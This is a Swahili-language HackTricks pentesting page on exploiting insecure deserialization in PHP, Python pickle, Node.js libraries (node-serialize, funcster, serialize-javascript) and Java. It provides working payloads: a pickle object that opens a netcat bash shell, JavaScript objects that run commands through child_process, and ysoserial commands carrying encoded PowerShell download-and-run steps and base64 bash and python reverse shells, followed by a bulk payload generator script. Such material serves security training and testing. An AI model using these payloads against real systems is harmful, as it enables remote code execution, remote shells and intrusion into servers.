# Ufumaji wa Data

<details>

<summary><strong>Jifunze ufumaji wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako inayotangazwa katika HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kufuma kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>


## Taarifa Msingi

**Ufumaji** unaeleweka kama njia ya kubadilisha kitu kuwa muundo ambao unaweza kuhifadhiwa, na lengo la kuhifadhi kitu au kuwasilisha sehemu ya mchakato wa mawasiliano. Mbinu hii mara nyingi hutumiwa kuhakikisha kuwa kitu kinaweza kurejeshwa wakati mwingine, kwa kudumisha muundo na hali yake.

**Ufumuzi**, kwa upande mwingine, ni mchakato unaopinga ufumaji. Inahusisha kuchukua data ambayo imepangwa katika muundo maalum na kuirejesha kuwa kitu.

Ufumuzi unaweza kuwa hatari kwa sababu inawezekana **kuruhusu wadukuzi kubadilisha data iliyofumwa ili kutekeleza nambari hatari** au kusababisha tabia isiyotarajiwa katika programu wakati wa mchakato wa kurejesha kitu.


## PHP

Katika PHP, njia maalum za kichawi hutumiwa wakati wa mchakato wa ufumaji na ufumuzi:

* `__sleep`: Inaitwa wakati kitu kinapofumwa. Njia hii inapaswa kurudisha safu ya majina ya mali zote za kitu ambazo zinapaswa kufumwa. Mara nyingi hutumiwa kuweka data inayosubiri au kutekeleza kazi za kusafisha sawa.
* `__wakeup`: Inaitwa wakati kitu kinapofumuliwa. Hutumiwa kurejesha uhusiano wowote wa hifadhidata ambao unaweza kuwa umepotea wakati wa ufumaji na kutekeleza kazi zingine za kuanzisha upya.
* `__unserialize`: Njia hii inaitwa badala ya `__wakeup` (ikiwepo) wakati kitu kinapofumuliwa. Inatoa udhibiti zaidi juu ya mchakato wa ufumuzi ikilinganishwa na `__wakeup`.
* `__destruct`: Njia hii inaitwa wakati kitu kinapokuwa karibu kuharibiwa au wakati hati inamalizika. Kawaida hutumiwa kwa kazi za kusafisha, kama kufunga vitambulisho vya faili au uhusiano wa hifadhidata.
* `__toString`: Njia hii inaruhusu kitu kutendewa kama herufi. Inaweza kutumika kusoma faili au kazi zingine zinazotegemea wito wa kazi ndani yake, ikitoa uwakilishi wa maandishi wa kitu.
```php
<?php
class test {
public $s = "This is a test";
public function displaystring(){
echo $this->s.'<br />';
}
public function __toString()
{
echo '__toString method called';
}
public function __construct(){
echo "__construct method called";
}
public function __destruct(){
echo "__destruct method called";
}
public function __wakeup(){
echo "__wakeup method called";
}
public function __sleep(){
echo "__sleep method called";
return array("s"); #The "s" makes references to the public attribute
}
}

$o = new test();
$o->displaystring();
$ser=serialize($o);
echo $ser;
$unser=unserialize($ser);
$unser->displaystring();

/*
php > $o = new test();
__construct method called
__destruct method called
php > $o->displaystring();
This is a test<br />

php > $ser=serialize($o);
__sleep method called

php > echo $ser;
O:4:"test":1:{s:1:"s";s:14:"This is a test";}

php > $unser=unserialize($ser);
__wakeup method called
__destruct method called

php > $unser->displaystring();
This is a test<br />
*/
?>
```
Ikiwa unatazama matokeo, unaweza kuona kuwa kazi **`__wakeup`** na **`__destruct`** huitwa wakati kitu kinapomalizika. Tafadhali kumbuka kuwa katika mafunzo kadhaa utapata kuwa kazi ya **`__toString`** inaitwa wakati unajaribu kuchapisha sifa fulani, lakini inaonekana kuwa **haifanyiki tena**.

{% hint style="warning" %}
Njia ya **`__unserialize(array $data)`** inaitwa **badala ya `__wakeup()`** ikiwa imeanzishwa katika darasa. Inakuwezesha kufuta kielelezo kwa kutoa data iliyohifadhiwa kama safu. Unaweza kutumia njia hii kufuta mali na kutekeleza kazi zozote muhimu wakati wa kumaliza.
```php
class MyClass {
private $property;

public function __unserialize(array $data): void {
$this->property = $data['property'];
// Perform any necessary tasks upon deserialization.
}
}
```
{% endhint %}

Unaweza kusoma mfano ulioelezewa wa PHP hapa: [https://www.notsosecure.com/remote-code-execution-via-php-unserialize/](https://www.notsosecure.com/remote-code-execution-via-php-unserialize/), hapa [https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf) au hapa [https://securitycafe.ro/2015/01/05/understanding-php-object-injection/](https://securitycafe.ro/2015/01/05/understanding-php-object-injection/)

### PHP Deserial + Autoload Classes

Unaweza kutumia utendaji wa kiotomatiki wa PHP kusoma faili za php zisizo na kikomo na zaidi:

{% content-ref url="php-deserialization-+-autoload-classes.md" %}
[php-deserialization-+-autoload-classes.md](php-deserialization-+-autoload-classes.md)
{% endcontent-ref %}

### Kusindika Thamani Zilizorejelewa

Ikiwa kwa sababu fulani unataka kusindika thamani kama **marejeleo kwa thamani nyingine iliyosindikwa**, unaweza:
```php
<?php
class AClass {
public $param1;
public $param2;
}

$o = new WeirdGreeting;
$o->param1 =& $o->param22;
$o->param = "PARAM";
$ser=serialize($o);
```
### PHPGGC (ysoserial kwa PHP)

[**PHPGGC**](https://github.com/ambionics/phpggc) inaweza kukusaidia kuunda mizigo ya kudhuru deserializations za PHP.\
Tafadhali kumbuka kuwa katika visa kadhaa huenda **usiweze kupata njia ya kudhuru deserialization katika msimbo wa chanzo** wa programu lakini unaweza kuwa na uwezo wa **kudhuru msimbo wa nyongeza za PHP za nje.**\
Kwa hivyo, ikiwa unaweza, angalia `phpinfo()` ya seva na **tafuta kwenye mtandao** (na hata kwenye **vifaa** vya **PHPGGC**) baadhi ya vifaa vinavyowezekana ambavyo unaweza kudhuru.

### deserialization ya metadata ya phar://

Ikiwa umepata LFI ambayo inasoma tu faili na sio kutekeleza msimbo wa php ndani yake, kwa mfano kwa kutumia kazi kama _**file\_get\_contents(), fopen(), file() au file\_exists(), md5\_file(), filemtime() au filesize()**_**.** Unaweza jaribu kudhuru **deserialization** inayotokea wakati wa **kusoma** faili kwa kutumia itifaki ya **phar**.\
Kwa habari zaidi soma chapisho lifuatalo:

{% content-ref url="../file-inclusion/phar-deserialization.md" %}
[phar-deserialization.md](../file-inclusion/phar-deserialization.md)
{% endcontent-ref %}

## Python

### **Pickle**

Wakati kitu kinapopata unpickle, kazi ya _\_\_reduce\_\__ itatekelezwa.\
Unapodukuliwa, seva inaweza kurudisha kosa.
```python
import pickle, os, base64
class P(object):
def __reduce__(self):
return (os.system,("netcat -c '/bin/bash -i' -l -p 1234 ",))
print(base64.b64encode(pickle.dumps(P())))
```
Kwa habari zaidi kuhusu kutoroka kutoka kwa **pickle jails**, angalia:

{% content-ref url="../../generic-methodologies-and-resources/python/bypass-python-sandboxes/" %}
[bypass-python-sandboxes](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/)
{% endcontent-ref %}

### Yaml **&** jsonpickle

Ukurasa ufuatao unaonyesha mbinu za **kutumia deserialization isiyokuwa salama katika maktaba za python za yamls** na unamalizika na zana ambayo inaweza kutumika kuzalisha mzigo wa deserialization wa RCE kwa **Pickle, PyYAML, jsonpickle na ruamel.yaml**:

{% content-ref url="python-yaml-deserialization.md" %}
[python-yaml-deserialization.md](python-yaml-deserialization.md)
{% endcontent-ref %}

### Uchafuzi wa Darasa (Python Prototype Pollution)

{% content-ref url="../../generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md" %}
[class-pollution-pythons-prototype-pollution.md](../../generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md)
{% endcontent-ref %}

## NodeJS

### JS Magic Functions

JS **haina "magic" functions** kama PHP au Python ambazo zitatekelezwa tu kwa kujenga kitu. Lakini ina **functions** ambazo **hutumiwa mara kwa mara hata bila kuziita moja kwa moja** kama vile **`toString`**, **`valueOf`**, **`toJSON`**.\
Ikiwa unatumia deserialization unaweza **kuathiri** hizi **functions** ili kutekeleza nambari nyingine (kwa kutumia uchafuzi wa prototype) unaweza kutekeleza nambari ya aina yoyote wakati zinaitwa.

Njia nyingine ya **"magic" ya kuita kazi** bila kuiita moja kwa moja ni kwa **kuathiri kitu ambacho kinarudishwa na kazi ya async** (ahadi). Kwa sababu, ikiwa **unabadilisha** kitu hicho **kurudi ahadi nyingine** na **mali** iliyoitwa **"then" ya aina ya kazi**, itatekelezwa tu kwa sababu imerudishwa na ahadi nyingine. _Fuata_ [_**kiunga hiki**_](https://blog.huli.tw/2022/07/11/en/googlectf-2022-horkos-writeup/) _kwa habari zaidi._
```javascript
// If you can compromise p (returned object) to be a promise
// it will be executed just because it's the return object of an async function:
async function test_resolve() {
const p = new Promise(resolve => {
console.log('hello')
resolve()
})
return p
}

async function test_then() {
const p = new Promise(then => {
console.log('hello')
return 1
})
return p
}

test_ressolve()
test_then()
//For more info: https://blog.huli.tw/2022/07/11/en/googlectf-2022-horkos-writeup/
```
### `__proto__` na `prototype` uchafuzi

Ikiwa unataka kujifunza kuhusu mbinu hii **angalia mafunzo yafuatayo**:

{% content-ref url="nodejs-proto-prototype-pollution/" %}
[nodejs-proto-prototype-pollution](nodejs-proto-prototype-pollution/)
{% endcontent-ref %}

### [node-serialize](https://www.npmjs.com/package/node-serialize)

Hii maktaba inaruhusu kufanya kazi za kisasa. Mfano:
```javascript
var y = {
"rce": function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })},
}
var serialize = require('node-serialize');
var payload_serialized = serialize.serialize(y);
console.log("Serialized: \n" + payload_serialized);
```
**Kitu kilichosanifishwa** kitaonekana kama:
```bash
{"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })}"}
```
Unaweza kuona katika mfano kwamba wakati kazi inaserializwa, bendera ya `_$$ND_FUNC$$_` inaongezwa kwenye kitu kilichoserializwa.

Ndani ya faili `node-serialize/lib/serialize.js` unaweza kupata bendera hiyo hiyo na jinsi namna kanuni inavyoitumia.

![](<../../.gitbook/assets/image (297).png>)

![](<../../.gitbook/assets/image (298).png>)

Kama unavyoona katika kipande cha mwisho cha kanuni, **ikiwa bendera inapatikana** `eval` inatumika kuserializa kazi, kwa hivyo kimsingi **kuingia kwa mtumiaji inatumika ndani ya kazi ya `eval`**.

Hata hivyo, **kwa kuserializa tu** kazi **haitatekelezwa** kwa sababu itakuwa ni lazima sehemu fulani ya kanuni iwe **inaita `y.rce`** katika mfano wetu na hiyo ni **isiyowezekana**.\
Hata hivyo, unaweza tu **kubadilisha kitu kilichoserializwa** **kwa kuongeza mabano** ili kutekeleza kiotomatiki kazi iliyoserializwa wakati kitu kinaposerializwa.\
Katika kipande kijacho cha kanuni, **tazama mabano ya mwisho** na jinsi kazi ya `unserialize` itavyotekeleza kanuni kiotomatiki:
```javascript
var serialize = require('node-serialize');
var test = {"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) }); }()"};
serialize.unserialize(test);
```
Kama ilivyoelezwa hapo awali, maktaba hii itapata nambari baada ya `_$$ND_FUNC$$_` na itaitekeleza kwa kutumia `eval`. Kwa hiyo, ili kutekeleza nambari moja kwa moja, unaweza kufuta sehemu ya kuunda kazi na mabano ya mwisho na tu kutekeleza JS oneliner kama katika mfano ufuatao:
```javascript
var serialize = require('node-serialize');
var test = '{"rce":"_$$ND_FUNC$$_require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) })"}';
serialize.unserialize(test);
```
Unaweza [**kupata hapa**](https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/) **maelezo zaidi** kuhusu jinsi ya kutumia udhaifu huu.

### [funcster](https://www.npmjs.com/package/funcster)

Jambo muhimu la kuzingatia kuhusu **funcster** ni kutokuwepo kwa **vitu vya kawaida vilivyojengwa**; vipo nje ya wigo wa kupatikana. Kizuizi hiki kinazuia utekelezaji wa namna ya kuita njia kwenye vitu vilivyojengwa, na hivyo kusababisha makosa kama `"ReferenceError: console is not defined"` wakati amri kama `console.log()` au `require(something)` zinapotumiwa.

Licha ya kizuizi hiki, kurudisha upatikanaji kamili wa muktadha wa kimataifa, pamoja na vitu vyote vya kawaida vilivyojengwa, kunawezekana kupitia njia maalum. Kwa kutumia moja kwa moja muktadha wa kimataifa, mtu anaweza kuepuka kizuizi hiki. Kwa mfano, upatikanaji unaweza kurejeshwa kwa kutumia sehemu ifuatayo:
```javascript
funcster = require("funcster");
//Serialization
var test = funcster.serialize(function() { return "Hello world!" })
console.log(test) // { __js_function: 'function(){return"Hello world!"}' }

//Deserialization with auto-execution
var desertest1 = { __js_function: 'function(){return "Hello world!"}()' }
funcster.deepDeserialize(desertest1)
var desertest2 = { __js_function: 'this.constructor.constructor("console.log(1111)")()' }
funcster.deepDeserialize(desertest2)
var desertest3 = { __js_function: 'this.constructor.constructor("require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });")()' }
funcster.deepDeserialize(desertest3)
```
**Kwa**[ **majarida zaidi soma chanzo hiki**](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)**.**

### [**serialize-javascript**](https://www.npmjs.com/package/serialize-javascript)

Kifurushi cha **serialize-javascript** kimeundwa kwa ajili ya kusindika tu, na hakina uwezo wa kujenga upya data. Watumiaji wanawajibika kutekeleza njia yao wenyewe ya kujenga upya data. Matumizi moja kwa moja ya `eval` yanapendekezwa na mfano rasmi wa kujenga upya data iliyosindikwa:
```javascript
function deserialize(serializedJavascript){
return eval('(' + serializedJavascript + ')');
}
```
Ikiwa kazi hii inatumika kwa kusindika tena vitu, unaweza **kuitumia kwa urahisi** kwa kudanganya:
```javascript
var serialize = require('serialize-javascript');
//Serialization
var test = serialize(function() { return "Hello world!" });
console.log(test) //function() { return "Hello world!" }

//Deserialization
var test = "function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) }); }()"
deserialize(test)
```
**Kwa**[ **majarida zaidi soma chanzo hiki**](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)**.**

### Maktaba ya Cryo

Katika kurasa zifuatazo unaweza kupata habari kuhusu jinsi ya kutumia maktaba hii kutekeleza amri za kiholela:

* [https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)
* [https://hackerone.com/reports/350418](https://hackerone.com/reports/350418)

## Java - HTTP

Katika Java, **wito wa deserialization hutekelezwa wakati wa mchakato wa deserialization**. Utekelezaji huu unaweza kutumiwa na wadukuzi ambao hujenga mizigo ya hatari ambayo inasababisha wito huu, ikisababisha utekelezaji wa vitendo hatari.

### Alama za Vidole

#### Sanduku Jeupe

Ili kutambua uwezekano wa udhaifu wa serialization katika msimbo wa chanzo, tafuta:

* Darasa ambazo zinatekeleza kiolesura cha `Serializable`.
* Matumizi ya `java.io.ObjectInputStream`, `readObject`, `readUnshare` kazi.

Tilia maanani zaidi:

* `XMLDecoder` inayotumiwa na parameta zilizofafanuliwa na watumiaji wa nje.
* `XStream`'s `fromXML` method, hasa ikiwa toleo la XStream ni sawa au chini ya 1.46, kwani ina hatari ya masuala ya serialization.
* `ObjectInputStream` iliyounganishwa na njia ya `readObject`.
* Utekelezaji wa njia kama vile `readObject`, `readObjectNodData`, `readResolve`, au `readExternal`.
* `ObjectInputStream.readUnshared`.
* Matumizi ya jumla ya `Serializable`.

#### Sanduku Jeusi

Kwa ajili ya upimaji wa sanduku jeusi, tafuta **saini au "Magic Bytes"** maalum ambayo inaonyesha vitu vilivyoseriwa vya Java (vinavyotokana na `ObjectInputStream`):

* Mfano wa hexadecimal: `AC ED 00 05`.
* Mfano wa Base64: `rO0`.
* Vichwa vya majibu ya HTTP na `Content-type` iliyowekwa kuwa `application/x-java-serialized-object`.
* Mfano wa hexadecimal unaonyesha ujazo uliotangulia: `1F 8B 08 00`.
* Mfano wa Base64 unaonyesha ujazo uliotangulia: `H4sIA`.
* Faili za wavuti zenye kipengele cha ugani `.faces` na parameta ya `faces.ViewState`. Kugundua mifano hii katika programu ya wavuti inapaswa kuchochea uchunguzi kama ilivyoelezwa kwa undani katika [chapisho kuhusu Deserialization ya Java JSF ViewState](java-jsf-viewstate-.faces-deserialization.md).
```
javax.faces.ViewState=rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwdAAML2xvZ2luLnhodG1s
```
### Angalia ikiwa kuna udhaifu

Ikiwa unataka **kujifunza jinsi shambulio la Deserialized la Java linavyofanya kazi**, unapaswa kuangalia [**Deserialized ya Msingi ya Java**](basic-java-deserialization-objectinputstream-readobject.md), [**Deserialized ya Java DNS**](java-dns-deserialization-and-gadgetprobe.md), na [**Malipo ya CommonsCollection1**](java-transformers-to-rutime-exec-payload.md).

#### Jaribio la Sanduku Jeupe

Unaweza kuangalia ikiwa kuna programu yoyote iliyosanikishwa na udhaifu uliojulikana.
```bash
find . -iname "*commons*collection*"
grep -R InvokeTransformer .
```
Unaweza **kujaribu kuangalia maktaba zote** ambazo inajulikana kuwa na udhaifu na ambazo [**Ysoserial**](https://github.com/frohoff/ysoserial) inaweza kutoa shambulio. Au unaweza kuangalia maktaba zilizotajwa kwenye [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#genson-json).\
Unaweza pia kutumia [**gadgetinspector**](https://github.com/JackOfMostTrades/gadgetinspector) kutafuta mnyororo wa vifaa unaoweza kudhuriwa.\
Unapoendesha **gadgetinspector** (baada ya kuijenga), usijali juu ya onyo/makosa mengi yanayotokea na acha iishe. Itaandika matokeo yote chini ya _gadgetinspector/gadget-results/gadget-chains-year-month-day-hore-min.txt_. Tafadhali kumbuka kuwa **gadgetinspector haitaunda shambulio na inaweza kuonyesha matokeo sahihi ya uwongo**.

#### Jaribio la Sanduku Jeusi

Kwa kutumia kifaa cha Burp [**gadgetprobe**](java-dns-deserialization-and-gadgetprobe.md), unaweza kutambua **maktaba zipi zinapatikana** (na hata toleo). Kwa habari hii, inaweza kuwa **rahisi kuchagua mzigo** wa kutumia kudh exploit udhaifu.\
[**Soma hii ili kujifunza zaidi kuhusu GadgetProbe**](java-dns-deserialization-and-gadgetprobe.md#gadgetprobe)**.**\
GadgetProbe inalenga katika **deserializations za `ObjectInputStream`**.

Kwa kutumia kifaa cha Burp [**Java Deserialization Scanner**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner), unaweza kutambua maktaba zenye udhaifu unaoweza kudhuriwa na ysoserial na **kuzidhuru**.\
[**Soma hii ili kujifunza zaidi kuhusu Java Deserialization Scanner.**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner)\
Java Deserialization Scanner inalenga katika deserializations za **`ObjectInputStream`**.

Unaweza pia kutumia [**Freddy**](https://github.com/nccgroup/freddy) kutambua udhaifu wa **deserializations** katika **Burp**. Programu hii itagundua udhaifu sio tu unaohusiana na **`ObjectInputStream`** bali pia udhaifu kutoka kwa maktaba za deserializations za **Json** na **Yml**. Kwa hali ya kazi, itajaribu kuthibitisha udhaifu huo kwa kutumia mzigo wa kulala au DNS.\
[**Unaweza kupata habari zaidi kuhusu Freddy hapa.**](https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2018/june/finding-deserialisation-issues-has-never-been-easier-freddy-the-serialisation-killer/)

**Jaribio la Uundaji wa Mfululizo**

Sio kila kitu kuhusu kuangalia ikiwa kuna maktaba zenye udhaifu zinazotumiwa na seva. Mara nyingi unaweza **kubadilisha data ndani ya kitu kilichosimbwa na kuepuka ukaguzi fulani** (labda kukupa mamlaka ya msimamizi ndani ya programu ya wavuti).\
Ikiwa unapata kitu kilichosimbwa cha Java kinachotumwa kwa programu ya wavuti, **unaweza kutumia** [**SerializationDumper**](https://github.com/NickstaDB/SerializationDumper) **kuchapisha kwa muundo unaoweza kusomwa na binadamu kitu kilichosimbwa kinachotumwa**. Kujua ni data gani unayotuma kutakuwa rahisi kubadilisha na kuepuka ukaguzi fulani.

### **Shambulio**

#### **ysoserial**

Zana kuu ya kudhuru deserializations za Java ni [**ysoserial**](https://github.com/frohoff/ysoserial) ([**pakua hapa**](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)). Unaweza pia kuzingatia kutumia [**ysoseral-modified**](https://github.com/pimps/ysoserial-modified) ambayo itakuruhusu kutumia amri ngumu (kwa mfano, na mabomba).\
Tafadhali kumbuka kuwa zana hii inalenga katika kudhuru **`ObjectInputStream`**.\
Ningeanza kwa kutumia mzigo wa "URLDNS" **kabla ya mzigo wa RCE** ili kujaribu ikiwa uingizaji ni wa kawaida. Hata hivyo, kumbuka kuwa mzigo wa "URLDNS" huenda usifanye kazi lakini mzigo mwingine wa RCE unaweza.
```bash
# PoC to make the application perform a DNS req
java -jar ysoserial-master-SNAPSHOT.jar URLDNS http://b7j40108s43ysmdpplgd3b7rdij87x.burpcollaborator.net > payload

# PoC RCE in Windows
# Ping
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections5 'cmd /c ping -n 5 127.0.0.1' > payload
# Time, I noticed the response too longer when this was used
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c timeout 5" > payload
# Create File
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c echo pwned> C:\\\\Users\\\\username\\\\pwn" > payload
# DNS request
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c nslookup jvikwa34jwgftvoxdz16jhpufllb90.burpcollaborator.net"
# HTTP request (+DNS)
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c certutil -urlcache -split -f http://j4ops7g6mi9w30verckjrk26txzqnf.burpcollaborator.net/a a"
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAYwBlADcAMABwAG8AbwB1ADAAaABlAGIAaQAzAHcAegB1AHMAMQB6ADIAYQBvADEAZgA3ADkAdgB5AC4AYgB1AHIAcABjAG8AbABsAGEAYgBvAHIAYQB0AG8AcgAuAG4AZQB0AC8AYQAnACkA"
## In the ast http request was encoded: IEX(New-Object Net.WebClient).downloadString('http://1ce70poou0hebi3wzus1z2ao1f79vy.burpcollaborator.net/a')
## To encode something in Base64 for Windows PS from linux you can use: echo -n "<PAYLOAD>" | iconv --to-code UTF-16LE | base64 -w0
# Reverse Shell
## Encoded: IEX(New-Object Net.WebClient).downloadString('http://192.168.1.4:8989/powercat.ps1')
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4ANAA6ADgAOQA4ADkALwBwAG8AdwBlAHIAYwBhAHQALgBwAHMAMQAnACkA"

#PoC RCE in Linux
# Ping
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "ping -c 5 192.168.1.4" > payload
# Time
## Using time in bash I didn't notice any difference in the timing of the response
# Create file
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "touch /tmp/pwn" > payload
# DNS request
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "dig ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net"
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "nslookup ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net"
# HTTP request (+DNS)
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "curl ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net" > payload
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "wget ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net"
# Reverse shell
## Encoded: bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" | base64 -w0
## Encoded: export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,ZXhwb3J0IFJIT1NUPSIxMjcuMC4wLjEiO2V4cG9ydCBSUE9SVD0xMjM0NTtweXRob24gLWMgJ2ltcG9ydCBzeXMsc29ja2V0LG9zLHB0eTtzPXNvY2tldC5zb2NrZXQoKTtzLmNvbm5lY3QoKG9zLmdldGVudigiUkhPU1QiKSxpbnQob3MuZ2V0ZW52KCJSUE9SVCIpKSkpO1tvcy5kdXAyKHMuZmlsZW5vKCksZmQpIGZvciBmZCBpbiAoMCwxLDIpXTtwdHkuc3Bhd24oIi9iaW4vc2giKSc=}|{base64,-d}|{bash,-i}"

# Base64 encode payload in base64
base64 -w0 payload
```
Wakati unatengeneza mzigo wa **java.lang.Runtime.exec()**, huwezi kutumia herufi maalum kama ">" au "|" kuhamisha matokeo ya utekelezaji, "$()" kutekeleza amri au hata **kupeleka hoja** kwa amri zilizotenganishwa na **nafasi** (unaweza kufanya `echo -n "hello world"` lakini huwezi kufanya `python2 -c 'print "Hello world"'`). Ili kuweza kuweka mzigo kwa usahihi, unaweza [tumia tovuti hii](http://www.jackson-t.ca/runtime-exec-payloads.html).

Tumia hati ifuatayo kuunda mzigo wa **utekelezaji wa nambari zote inayowezekana** kwa Windows na Linux na kisha jaribu kwenye ukurasa wa wavuti ulio hatarini:
```python
import os
import base64

# You may need to update the payloads
payloads = ['BeanShell1', 'Clojure', 'CommonsBeanutils1', 'CommonsCollections1', 'CommonsCollections2', 'CommonsCollections3', 'CommonsCollections4', 'CommonsCollections5', 'CommonsCollections6', 'CommonsCollections7', 'Groovy1', 'Hibernate1', 'Hibernate2', 'JBossInterceptors1', 'JRMPClient', 'JSON1', 'JavassistWeld1', 'Jdk7u21', 'MozillaRhino1', 'MozillaRhino2', 'Myfaces1', 'Myfaces2', 'ROME', 'Spring1', 'Spring2', 'Vaadin1', 'Wicket1']
def generate(name, cmd):
for payload in payloads:
final = cmd.replace('REPLACE', payload)
print 'Generating ' + payload + ' for ' + name + '...'
command = os.popen('java -jar ysoserial.jar ' + payload + ' "' + final + '"')
result = command.read()
command.close()
encoded = base64.b64encode(result)
if encoded != "":
open(name + '_intruder.txt', 'a').write(encoded + '\n')

generate('Windows', 'ping -n 1 win.REPLACE.server.local')
generate('Linux', 'ping -c 1 nix.REPLACE.server.local')
```
#### serialkillerbypassgadgets

Unaweza **kutumia** [**https://github.com/pwntester/SerialKillerBypassGadgetCollection**](https://github.com/pwntester/SerialKillerBypassGadgetCollection) **pamoja na ysoserial kuunda mbinu zaidi za kudukua**. Taarifa zaidi kuhusu zana hii zinapatikana katika **slaidi za mazungumzo** ambapo zana ilipokuwa ikipresentiwa: [https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next\_slideshow=1](https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next\_slideshow=1)

#### marshalsec

[**marshalsec**](https://github.com/mbechler/marshalsec) inaweza kutumika kuunda mizigo ya kudukua maktaba tofauti za usanurishaji za **Json** na **Yml** katika Java.\
Ili kuunda mradi, nilihitaji **kuongeza** **tegemezi** hizi kwenye `pom.xml`:
```markup
<dependency>
<groupId>javax.activation</groupId>
<artifactId>activation</artifactId>
<version>1.1.1</version>
</dependency>

<dependency>
<groupId>com.sun.jndi</groupId>
<artifactId>rmiregistry</artifactId>
<version>1.2.1</version>
<type>pom</type>
</dependency>
```
**Sakinisha maven**, na **kamilisha** mradi:
```bash
sudo apt-get install maven
mvn clean package -DskipTests
```
#### FastJSON

Soma zaidi kuhusu maktaba ya Java JSON hapa: [https://www.alphabot.com/security/blog/2020/java/Fastjson-exceptional-deserialization-vulnerabilities.html](https://www.alphabot.com/security/blog/2020/java/Fastjson-exceptional-deserialization-vulnerabilities.html)

### Maabara

* Ikiwa unataka kujaribu baadhi ya malipo ya ysoserial unaweza **kukimbia programu hii ya wavuti**: [https://github.com/hvqzao/java-deserialize-webapp](https://github.com/hvqzao/java-deserialize-webapp)
